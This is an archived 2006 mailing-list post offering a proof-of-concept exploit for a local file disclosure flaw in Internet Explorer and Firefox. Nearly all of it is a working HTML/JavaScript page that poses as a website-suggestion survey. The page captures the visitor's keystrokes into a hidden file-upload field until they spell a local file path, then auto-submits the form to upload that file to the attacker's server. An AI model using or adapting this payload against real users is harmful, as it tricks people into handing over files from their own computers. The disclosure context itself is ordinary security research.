Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)

From: sirdarckcat () gmail com
Date: 11 Jun 2006 09:37:33 -0000
This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.

The subjects of the links sugested, are for forcing the user to input:
FILE
AUTOEXEC
BAT

so we can receive:
file://c:/autoexec.bat

and upload this file to a server.

This is a low risk vulnerability.

//--START HTML CODE--//
<html>
<body>
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
*  OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
*               by sirdarckcat [at] gmail [.] com
*                   from:       elhacker.net
**/
var nidshift = new Array(0 ,0 ,0 ,0 ,1  ,0  ,0  ,0 ,1  ,0  ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0  ,0 ,0 ,0);
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84);
var thefilew = "file://c:/autoexec.bat";
var dv = 0;
var chift = false;
var teo = document.forms[0].thet;
var feo = document.forms[0].other;

function checa(tecla) {
                var rt=(tecla.which)?tecla.which:event.keyCode;
                var lw=String.fromCharCode(rt);
                if (dv>=thefilew.length){
                        document.forms[0].submit();
                }
                if (rt == 16){
                        chift = true;
                }
                if (rt==thefilek[dv]){
                        if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
                                teo.disabled=false;
                                teo.style.visibility="visible";
                                teo.focus();
                                feo.value += thefilew[dv];
                                dv++;
                        }
                }else{
                        feo.focus();
                        teo.disabled=true;
                        teo.style.visibility="hidden";
                }
}
function solsh(tecla){
        var rt=(tecla.which)?tecla.which:event.keyCode;
        if (rt == 16){
                chift = false;
        }
}
function mprss(tecla){
        var rt=(tecla.which)?tecla.which:event.keyCode;
        if (rt == 16){
                chift = true;
        }
}
document.onkeydown = checa;
document.onkeyup   = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//

Att.
Sirdarckcat
www.elhacker.net
Previous By Date Next
Previous By Thread Next

Current thread: